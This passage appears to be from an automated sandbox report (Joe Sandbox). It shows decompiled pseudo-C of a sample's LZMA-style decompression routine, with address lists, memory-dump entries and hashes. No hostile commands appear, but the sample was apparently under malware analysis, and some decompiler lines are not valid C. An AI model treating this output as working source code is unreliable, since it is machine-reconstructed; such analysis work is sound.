                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							__eflags = __eax;
                          							__eax = _v92 + __eax + 4;
                          							goto L133;
                          						case 0x13:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								_t475 =  &_v92;
                          								 *_t475 = _v92 + 0x204;
                          								__eflags =  *_t475;
                          								_v52 = 0x10;
                          								_v68 = 8;
                          								L147:
                          								_v128 = 0x14;
                          								goto L148;
                          							}
                          							__eax = _v80;
                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							_v52 = 8;
                          							__eax = _v92 + (_v80 << 4) + 0x104;
                          							L133:
                          							_v92 = __eax;
                          							_v68 = 3;
                          							goto L147;
                          						case 0x14:
                          							_v52 = _v52 + __ebx;
                          							__eax = _v132;
                          							goto L143;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                          							goto L123;
                          						case 0x16:
                          							__eax = _v52;
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx = _v8;
                          							_v68 = 6;
                          							__eax = __eax << 7;
                          							_v128 = 0x19;
                          							_v92 = __eax;
                          							goto L148;
                          						case 0x17:
                          							L148:
                          							__eax = _v68;
                          							_v84 = 1;
                          							_v76 = _v68;
                          							goto L152;
                          						case 0x18:
                          							L149:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x18;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t490 =  &_v116;
                          							 *_t490 = _v116 + 1;
                          							__eflags =  *_t490;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L151:
                          							_t493 =  &_v76;
                          							 *_t493 = _v76 - 1;
                          							__eflags =  *_t493;
                          							L152:
                          							__eflags = _v76;
                          							if(_v76 <= 0) {
                          								__ecx = _v68;
                          								__ebx = _v84;
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx = _v84 - (1 << __cl);
                          								__eax = _v128;
                          								_v72 = __ebx;
                          								L143:
                          								_v140 = _t561;
                          								goto L3;
                          							}
                          							__eax = _v84;
                          							_v20 = _v20 >> 0xb;
                          							__edx = _v84 + _v84;
                          							__eax = _v92;
                          							__esi = __edx + __eax;
                          							_v88 = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								_v84 = __edx;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								_v84 = _v84 << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L151;
                          							} else {
                          								goto L149;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								_v48 = __ebx;
                          								L122:
                          								_t399 =  &_v48;
                          								 *_t399 = _v48 + 1;
                          								__eflags =  *_t399;
                          								L123:
                          								__eax = _v48;
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									_v52 = _v52 | 0xffffffff;
                          									goto L173;
                          								}
                          								__eflags = __eax - _v100;
                          								if(__eax > _v100) {
                          									goto L174;
                          								}
                          								_v52 = _v52 + 2;
                          								__eax = _v52;
                          								_t406 =  &_v100;
                          								 *_t406 = _v100 + _v52;
                          								__eflags =  *_t406;
                          								goto L126;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							_v48 = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								_v76 = __ecx;
                          								L105:
                          								__eflags = _v76;
                          								if(_v76 <= 0) {
                          									__eax = __eax + __ebx;
                          									_v68 = 4;
                          									_v48 = __eax;
                          									__eax = _v8;
                          									__eax = _v8 + 0x644;
                          									__eflags = __eax;
                          									L111:
                          									__ebx = 0;
                          									_v92 = __eax;
                          									_v84 = 1;
                          									_v72 = 0;
                          									_v76 = 0;
                          									L115:
                          									__eax = _v68;
                          									__eflags = _v76 - _v68;
                          									if(_v76 >= _v68) {
                          										_t397 =  &_v48;
                          										 *_t397 = _v48 + __ebx;
                          										__eflags =  *_t397;
                          										goto L122;
                          									}
                          									__eax = _v84;
                          									_v20 = _v20 >> 0xb;
                          									__edi = _v84 + _v84;
                          									__eax = _v92;
                          									__esi = __edi + __eax;
                          									_v88 = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = (_v20 >> 0xb) * __ecx;
                          									__eflags = _v16 - __edx;
                          									if(_v16 >= __edx) {
                          										__ecx = 0;
                          										_v20 = _v20 - __edx;
                          										__ecx = 1;
                          										_v16 = _v16 - __edx;
                          										__ebx = 1;
                          										__ecx = _v76;
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx = _v72;
                          										__ebx = _v72 | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										_v72 = __ebx;
                          										 *__esi = __ax;
                          										_v84 = __edi;
                          									} else {
                          										_v20 = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										_v84 = _v84 << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags = _v20 - 0x1000000;
                          									if(_v20 >= 0x1000000) {
                          										L114:
                          										_t374 =  &_v76;
                          										 *_t374 = _v76 + 1;
                          										__eflags =  *_t374;
                          										goto L115;
                          									} else {
                          										goto L112;
                          									}
                          								}
                          								__ecx = _v16;
                          								__ebx = __ebx + __ebx;
                          								_v20 = _v20 >> 1;
                          								__eflags = _v16 - _v20;
                          								_v72 = __ebx;
                          								if(_v16 >= _v20) {
                          									__ecx = _v20;
                          									_v16 = _v16 - _v20;
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									_v72 = __ebx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								if(_v20 >= 0x1000000) {
                          									L104:
                          									_t344 =  &_v76;
                          									 *_t344 = _v76 - 1;
                          									__eflags =  *_t344;
                          									goto L105;
                          								} else {
                          									goto L102;
                          								}
                          							}
                          							__edx = _v8;
                          							__eax = __eax - __ebx;
                          							_v68 = __ecx;
                          							__eax = _v8 + 0x55e + __eax * 2;
                          							goto L111;
                          						case 0x1a:
                          							L58:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1a;
                          								goto L173;
                          							}
                          							__ecx = _v108;
                          							__al = _v96;
                          							__edx = _v12;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_v104 = _v104 - 1;
                          							 *_v108 = __al;
                          							__ecx = _v24;
                          							 *(_v12 + __ecx) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t197 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t197;
                          							goto L82;
                          						case 0x1b:
                          							L78:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1b;
                          								goto L173;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__edx = _v12;
                          							__cl =  *(__edx + __eax);
                          							__eax = _v24;
                          							_v96 = __cl;
                          							 *(__edx + __eax) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t280 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t280;
                          							__eax = _v108;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_t289 =  &_v104;
                          							 *_t289 = _v104 - 1;
                          							__eflags =  *_t289;
                          							 *_v108 = __cl;
                          							L82:
                          							_v24 = __edx;
                          							goto L83;
                          						case 0x1c:
                          							while(1) {
                          								L126:
                          								__eflags = _v104;
                          								if(_v104 == 0) {
                          									break;
                          								}
                          								__eax = _v24;
                          								__eax = _v24 - _v48;
                          								__eflags = __eax - _v120;
                          								if(__eax >= _v120) {
                          									__eax = __eax + _v120;
                          									__eflags = __eax;
                          								}
                          								__edx = _v12;
                          								__cl =  *(__edx + __eax);
                          								__eax = _v24;
                          								_v96 = __cl;
                          								 *(__edx + __eax) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t420 = __eax % _v120;
                          								__eax = __eax / _v120;
                          								__edx = _t420;
                          								__eax = _v108;
                          								_v108 = _v108 + 1;
                          								_v104 = _v104 - 1;
                          								_v52 = _v52 - 1;
                          								__eflags = _v52;
                          								 *_v108 = __cl;
                          								_v24 = _t420;
                          								if(_v52 > 0) {
                          									continue;
                          								} else {
                          									L83:
                          									_v140 = 2;
                          									goto L3;
                          								}
                          							}
                          							_v140 = 0x1c;
                          							L173:
                          							_push(0x22);
                          							_pop(_t574);
                          							memcpy(_v148,  &_v140, _t574 << 2);
                          							return 0;
                          					}
                          				}
                          				L174:
                          				_t538 = _t537 | 0xffffffff;
                          				return _t538;
                          			}










































                          0x00405ead
                          0x00405eb4
                          0x00405eba
                          0x00405ec0
                          0x00000000
                          0x00405ec4
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405ee6
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efb
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f46
                          0x00405f49
                          0x00405f71
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4b
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f63
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fba
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fbf
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fdc
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406022
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066ca
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406700
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x00406728
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x004060bc
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                          • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E004062EB() {
                          				signed int _t539;
                          				unsigned short _t540;
                          				signed int _t541;
                          				void _t542;
                          				signed int _t543;
                          				signed int _t544;
                          				signed int _t573;
                          				signed int _t576;
                          				signed int _t597;
                          				signed int* _t614;
                          				void* _t621;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t621 - 0x40) != 1) {
                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                          						_t539 =  *(_t621 - 4) + 0x664;
                          						 *(_t621 - 0x58) = _t539;
                          						goto L68;
                          					} else {
                          						 *(__ebp - 0x84) = 8;
                          						while(1) {
                          							L132:
                          							 *(_t621 - 0x54) = _t614;
                          							while(1) {
                          								L133:
                          								_t540 =  *_t614;
                          								_t597 = _t540 & 0x0000ffff;
                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          								if( *(_t621 - 0xc) >= _t573) {
                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          									 *(_t621 - 0x40) = 1;
                          									_t541 = _t540 - (_t540 >> 5);
                          									 *_t614 = _t541;
                          								} else {
                          									 *(_t621 - 0x10) = _t573;
                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          								}
                          								if( *(_t621 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t621 - 0x6c) == 0) {
                          									 *(_t621 - 0x88) = 5;
                          									L170:
                          									_t576 = 0x22;
                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                          									_t544 = 0;
                          									L172:
                          									return _t544;
                          								}
                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
